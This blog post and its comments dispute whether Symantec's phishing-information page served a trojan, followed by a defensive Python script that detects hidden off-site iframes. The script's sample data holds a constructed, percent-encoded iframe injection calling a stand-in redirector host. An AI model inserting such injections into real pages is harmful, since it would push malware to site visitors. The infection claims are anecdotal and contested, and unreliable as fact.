Trojan virus found on Symantec. Symantec needs to clean its own site
Posted on June 16, 2012 | 4 Comments
Mike 4:21 AM (1 hour ago)
LOL!!!! You are going to love this. I went to Symantec’s (Norton’s) site to see how they determined what sites are “fraudulent”. There is nothing on there where you can submit a site, so they must put the sites in themselves. Now while on their site, they had a section on “phishing” (fraudulent sites). So, I clicked on the link to see what they had to say about it. Guess what? I got a VIRUS WARNING (see attached). So Symantec - the self-described leader of Internet Security and the one that falsely claims your site is fraudulent - has on their own site a page infected with the HTML Bayfraud Trojan. This Trojan uses spoofing technology (phishing - a fraudulent website), and appears to be an HTML page. It is designed to steal confidential information from eBay users. So it seems Symantec is hosting a fraudulent site.
Comments
4 Responses to “Trojan virus found on Symantec. Symantec needs to clean its own site”
June 16th, 2012 @ 2:18 pm
The poster doesn’t know what they are talking about. The cited trojan is a Windows executable, and can be run on a sun-java webserver. This means that the individual’s computer is infected, not Symantec.
June 16th, 2012 @ 2:18 pm
Correction, “Can’t” versus “can”.
June 17th, 2012 @ 6:53 pm
No, the poster is correct. It is a Windows executable that is hosted on the Symantec site. It is activated by a PHP script, on the Symantec site, to download the trojan to the user’s computer. The Symantec site is infected, not the user’s computer. I went to the section myself and my antivirus is blocking Symantec from downloading the virus TO my computer.
June 17th, 2012 @ 8:53 pm
Let me be a little more explicit on the above. When you went to the site, there are 2 options of the page being loaded – a regular HTML page and a gzipped HTML page. Depending on your browser, one of these two is loaded. It is the gzipped version that is flagged as being infected.
On a separate computer I use for these purposes (after I am done the drive is wiped and I am starting over with a clean system) I loaded the gzipped page. I then looked at the source code. There was an encoded iframe line that executed a PHP script that connected to another site that downloaded the trojan. Now I just rechecked the page a few minutes ago. Guess what? The iframe is gone. They must read Orly’s blog 🙂
I don’t think the original poster was implying that their site was infected and at risk. I think he was pointing out the irony of the situation. If you have followed the reports of Google claiming Orly’s site was infected, it was the same thing. Orly never had an infection on her site, it was an iframe that was put in on the page (that connected to the other site) after the site was hacked.
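
The check described in the last comment (comparing the plain and gzipped variants of a page and looking in the source for an encoded iframe), as an added example that is not part of the original post or its comments. The host names and page bodies are constructed sample data, and the function names are illustrative.

```python
import gzip
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

class IframeCollector(HTMLParser):
    """Collects the src of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.sources = []
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.sources.append(dict(attrs).get("src") or "")

def iframe_sources(html):
    """iframe src values in the markup and in percent-encoded string literals."""
    chunks = [html]
    # Quoted literals containing %XX escapes may decode to hidden markup.
    for literal in re.findall(r"""["']([^"'<>]*%[0-9A-Fa-f]{2}[^"'<>]*)["']""", html):
        chunks.append(unquote(literal))
    found = []
    for chunk in chunks:
        parser = IframeCollector()  # fresh parser so script/CDATA state never leaks
        parser.feed(chunk)
        parser.close()
        found.extend(parser.sources)
    return found

def offsite(sources, page_host):
    """Keep only sources whose host differs from the page's own host."""
    return {s for s in sources if urlparse(s).hostname not in (None, page_host)}

def variant_only_iframes(plain_body, gzip_body, page_host):
    """Off-site iframes present in the gzipped variant but not in the plain one."""
    plain = iframe_sources(plain_body.decode("utf-8", "replace"))
    zipped = iframe_sources(gzip.decompress(gzip_body).decode("utf-8", "replace"))
    return sorted(offsite(zipped, page_host) - offsite(plain, page_host))

# Constructed sample data (not captured from any real site).
PAGE_HOST = "www.example.com"
CLEAN = '<html><body><h1>Phishing</h1><iframe src="/help/video.html"></iframe></body></html>'
HIDDEN = '<iframe src="http://redirector.example.net/in.php"></iframe>'
ENCODED = "".join("%%%02X" % b for b in HIDDEN.encode())
TAMPERED = CLEAN.replace(
    "</body>", '<script>document.write(unescape("%s"))</script></body>' % ENCODED)

if __name__ == "__main__":
    print(variant_only_iframes(CLEAN.encode(), gzip.compress(TAMPERED.encode()), PAGE_HOST))
```

A non-empty result means the two variants of the same URL differ in what they embed from other hosts, which is the point at which the stored files on the server are worth inspecting.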